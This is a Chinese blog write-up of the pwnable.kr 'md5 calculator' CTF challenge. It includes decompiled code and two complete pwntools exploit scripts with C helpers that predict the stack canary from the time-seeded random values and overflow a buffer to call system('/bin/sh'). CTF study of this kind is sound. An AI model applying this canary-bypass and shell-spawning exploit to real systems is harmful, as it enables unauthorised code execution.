pwnable md5 calculator(随机数生成)

最新推荐文章于 2023-06-21 16:30:42 发布
原创 最新推荐文章于 2023-06-21 16:30:42 发布 · 559 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了一种利用栈溢出攻击技术,针对设置了Canary和NX保护的程序进行破解的方法。通过精心构造的输入,绕过安全防护,实现远程代码执行。文章提供了具体的漏洞分析、攻击脚本及优化方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

开启了canary和NX保护

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  int v5; // [esp+18h] [ebp-8h]
  int v6; // [esp+1Ch] [ebp-4h]

  setvbuf(stdout, 0, 1, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("- Welcome to the free MD5 calculating service -");
  v3 = time(0);
  srand(v3);
  v6 = my_hash();
  printf("Are you human? input captcha : %d\n", v6);
  __isoc99_scanf("%d", &v5);
  if ( v6 != v5 )
  {
    puts("wrong captcha!");
    exit(0);
  }
  puts("Welcome! you are authenticated.");
  puts("Encode your data with BASE64 then paste me!");
  process_hash();
  puts("Thank you for using our service.");
  system("echo `date` >> log");
  return 0;
}

大致看一下,这里的my_hash函数有点怪,它让canary和一些随机数进行了加减运算

然后进入process_hash()函数

unsigned int process_hash()
{
  int v0; // ST14_4
  char *ptr; // ST18_4
  char v3; // [esp+1Ch] [ebp-20Ch]
  unsigned int v4; // [esp+21Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  memset(&v3, 0, 0x200u);
  while ( getchar() != '\n' )
    ;
  memset(g_buf, 0, sizeof(g_buf));
  fgets(g_buf, 1024, stdin);
  memset(&v3, 0, 0x200u);
  v0 = Base64Decode(g_buf, (int)&v3);
  ptr = calc_md5((int)&v3, v0);
  printf("MD5(data) : %s\n", ptr);
  free(ptr);
  return __readgsdword(0x14u) ^ v4;
}

输入数据进行了base64解密放入v3
v3不能存储1024字节解密后的数据,造成了栈溢出。
在本地和远程时间相同生成的随机数是相同的,可以利用这一点获取到canary
hashc.c

#include<stdio.h>
#include<time.h>
int main()
{
	time_t seed=time(0);
	srand(seed);
	int v4,a;
	int v[8];
	for(int i=0;i<=7;i++)
	{
		v[i]=rand();
		
	}
	printf("%x",v[4]-v[6]+v[7]+v[2]-v[3]+v[1]+v[5]);
}

exp.py

from pwn import *
import os
import base64
bss=0x0804B0E0

call_system=0x08049187
def get_key():
        output=os.popen("./hashc")
        key=int(output.read(),16)
        print "key="+hex(key)
        return key
#p=process("./hash")
p=remote("pwnable.kr",9002)
#gdb.attach(p,"b *0x0804902B")

p.recvuntil("Are you human? input captcha : ")
key=get_key()
data=int(p.recv())
print "data="+hex(data)
canary=data-key

print "canary="+hex(canary)
p.sendline(str(data))
p32(canary)
payload=b64e("A"*0x200+p32(canary)+"a"*12+p32(call_system)+p32(bss+716+1))
print payload
print "len_payload=",len(payload)

payload+="\x00/bin/sh\x00"

p.recvuntil("paste me!")
p.sendline(payload)

p.interactive()

不过这个脚本有一点问题,canary是减过之后获取到的,如果为负数在p32的时候会失败。所以要多次尝试。

贴出一套更优的exp
hashc.c

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) 
{
    int m = atoi(argv[2]);    // argv[2] = captcha
    int rands[8];
    int i;

    srand(atoi(argv[1]));    // argv[1] = time
    for (i = 0; i <= 7; i++)
    {
        rands[i] = rand();
    }

    m -= rands[1] + rands[2] - rands[3] + rands[4] + rands[5] - rands[6] + rands[7];

    printf("%x\n", m);
    return 0;
}

exp.py

import os
import time
from pwn import *

context(os='linux', arch='i386', log_level='debug')

p = process("./hash")
gdb.attach(p,"b *0x08049026")
p.recvuntil(' : ')
captcha = p.recvline().strip()
t = int(time.time())    # time.time() return float value

cookie = int('0x' + os.popen('./cal_stack_canary %s %s' %(t, captcha)).read().strip(), 16)

p.sendline(captcha)
p.recvuntil('me!\n')

call_system_addr = 0x8049187
g_buf_addr = 0x804b0e0

payload = 0x200 * 'a'
payload += p32(cookie)
payload += 12 * 'b'
payload += p32(call_system_addr)
payload += p32(g_buf_addr + 537*4/3)

payload = b64e(payload)
payload += '/bin/sh\x00'

p.sendline(payload)

p.interactive()

不仅加载文件还有参数,新的调用姿势。

pwnable.tw calc writeup
jmp esp
09-27 1734
题目main:int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14, timeout); alarm(60); puts("=== Welcome to SECPROG calculator ==="); fflush(stdout); calc(); return puts
MD5 Calculator
09-25
此软件可用来计算 文件 字符 HEX 文件的MD5值,以及其他的Hash值
pwnable.kr】 md5 calculator
子曰小玖的博客
06-06 605
https://r00tnb.github.io/2018/02/25/pwnable.kr-md5%20calculator/ 前言 也是一个很有pwn味道的题目,涉及的知识在掌握范围内所以做起来很爽! 分析 题目只给了可执行文件hash。于是就放到ida中逆向了。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21...
pwnable.kr - md5 calculator
加号减减号的博客
03-07 1974
题目简介 分析 wirteup 参考资料 题目简介 题目给出的信息如下: 可知该题实现了一个 MD5 计算器,并且给出了一个提示,提示稍后再说。做这道题我学到了一个新的技能,就是 python 里面的 os.popen() 的用法,觉得十分有用,希望对大家也有帮助。 分析 下载得到文件,IDA 分析得到 main 函数如下: 这里可以得知几个关键的信息,...
pwnable.kr MD5 calcultor
mylyylmy的博客
08-01 516
首先看一下开了什么保护 使用IDA 反汇编 首先程序设置了时间为随机数种子,然后调用了my_hash函数,输出函数的返回值,接着让我们输入my_hash函数的返回值,输入正确才能继续运行程序,进入my_hash函数 首先程序读取了canary的值,并把它赋值给了v10,然后又通过v10变量计算了函数的返回值,在这里除了v10,其他的变量都可以通过时间相同的随机数计算出来(hint中提...
随机生成汉字与md5生成
xxb2008的专栏
04-06 1225
/* * 摘抄: * 汉字的机内码从第16区B0开始,并且从区位D7开始以后的汉字都是很难见到的繁杂汉字, 可以将这些排除。 * 所以随机生成汉字机字码的第1位范围在B、C、D之间。 * 如果第1位是D,则第2位区位码就不能是7以后的16进制数, * 由于每个区的第1个位置和最后一个位置是空的,没有汉字,因此: * 生成的区位码的第3位如果是A,第4位就不能是0,如果是F,
MD5Calculator_v1.0.rar
12-05
MD5Calculator_v1.0.rar 是一个压缩包文件,其中包含了一个名为 "MD5Calculator.exe" 的可执行程序。这个程序通常用于计算文件的MD5校验和,MD5(Message-Digest Algorithm 5)是一种广泛使用的哈希函数,它能将任意...
MD5Calculator多文件计算对比.exe
08-31
MD5Calculator多文件计算对比 使用说明: 1、拖拽文件或目录到该窗口内,即可计算MD5值。 2、支持拖拽多个文件或目录。 3、可比较两个MD5值,区分大小写。 4、勾选"文件名全路径"则输出文件全路径。 5、勾选"文件...
MD5_calculator
02-10
MD5 Calculator是一款用于计算文件MD5哈希值的工具,它是信息安全领域中常见的校验工具。MD5(Message-Digest Algorithm 5)是由美国计算机科学家Rivest在1991年设计的一种加密散列函数,它能将任意长度的信息转化为...
MD5calculator文件MD5计算工具2.6Build026000绿色免费版
07-24
MD5 Calculator是一款在IT安全领域常用的实用工具,主要用于计算文件的MD5哈希值。MD5(Message-Digest Algorithm 5)是一种广泛使用的密码散列函数,设计目标是产生一个128位(16字节)的散列值,通常以32位的十六...
stack canary之pwnbale.kr MD5 calculator
jiuweideqixu的博客
08-26 335
We made a simple MD5 calculator as a network service. Find a bug and exploit it to get a shell. Download : http://pwnable.kr/bin/hash hint : this service shares the same machine with pwnable.kr web service Running at : nc pwnable.kr 9002 程序的执行: ma.
非常好用的md5生成
06-28
非常好用的md5生成器,用来生成文件的md5校验码的工具。
python生成MD5加密的随机数
运维@小兵的博客
02-10 1710
>>> import hashlib,random >>> hashlib.md5(str(random.random()).encode()).hexdigest() '985b8fd8cbcb36aa0c51011fe72b59be'
随机编码生成器&MD5加密字符串工具
无线智能模块 可视DIY智能专家
04-21 1461
效果图(下图) 功能:1)随机编码生成 2)MD5加密字符串(支持大小写,16-32位切换) 本工具基于以前写的NFC读卡写入系统改版而成。 菜单:开始》退出;工具》记事本+计算器+控制面板;帮助:关于 其他选项一目了然;规则更改必须点击下应用规则再随机才能生效!md5加密带后缀特殊用途加了一个自定义的后缀(您可能用不到) 本计划是另一系统的 序列号(注册包)生成器 的辅助工具(后期可能用到)防止重复或猜测,无规则生成即可。 核心代码摘录如下: //核心代码 pu..
pwnable.kr】 rsa calculator
子曰小玖的博客
06-10 954
https://r00tnb.github.io/2018/03/14/pwnable.kr-rsa_calculator/ 前言 读代码题,虽然是逆向代码,哈哈。这道题得细心找,不能急,否则就得像我一样花了很长时间在printf的漏洞利用上了,悲催。 分析 分析反编译代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20...
java 生成随机md5_Java常用工具类(计算MD5,验证码随机生成,天数差值计算)
weixin_33603316的博客
02-13 928
写这个博文的目的是为了怕哪天自己的电脑崩溃了,以前写的那些代码就没了,所以将自己写的工具类贴出来,方便以后去使用,也避免自己反复去创造轮子,也可以对这些方法进行简单修改来完成业务需求,这样就可以极大的提高开发的效率。方法一:计算字符串的MD5的值使用方法很简单,直接把值传入方法中就可以了,会返回一个字符串String注意去获取。public final static String calculat...
nodejs随机生成5个100M的md5互不相同的文件,带每个文件的进度展示
weixin_42790369的博客
06-21 420
/ 每次写入的数据块大小为1MB。// 当前文件生成进度。// 每次生成的文件个数。// 同时生成的文件个数。// 继续生成下一个文件。// 生成指定大小的随机数据块。// 生成指定大小的随机数据块。// 生成数据并写入文件。
python整理十二——随机产生大量md5
hong201的专栏
09-10 2303
有时候为了测试,需要大量的md5,写个函数来生成:    import string, random    look_set = string.ascii_letters + string.digits    md5_len = 32    tmp_md5_ls = []    for k in range(10):        for i in range(md
MD5加密及随机数生成
探底
02-25 1240
今天贴两个简单的方法,需要的时候不用自己再写,   public static String md5(String plaintext){ MessageDigest m; try { m = MessageDigest.getInstance("MD5"); m.reset(); m.update(plaintext.getBytes()); ...
MD5 Calculator: 计算文件MD5及多种Hash值
- 验证软件下载的完整性:用户在下载软件后可以使用MD5 Calculator计算下载文件的MD5值,并与官方发布的MD5值进行对比,以确认下载文件是否完整无误。 - 检查文件篡改:在信息传输过程中,如果文件被篡改,其MD5值会...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值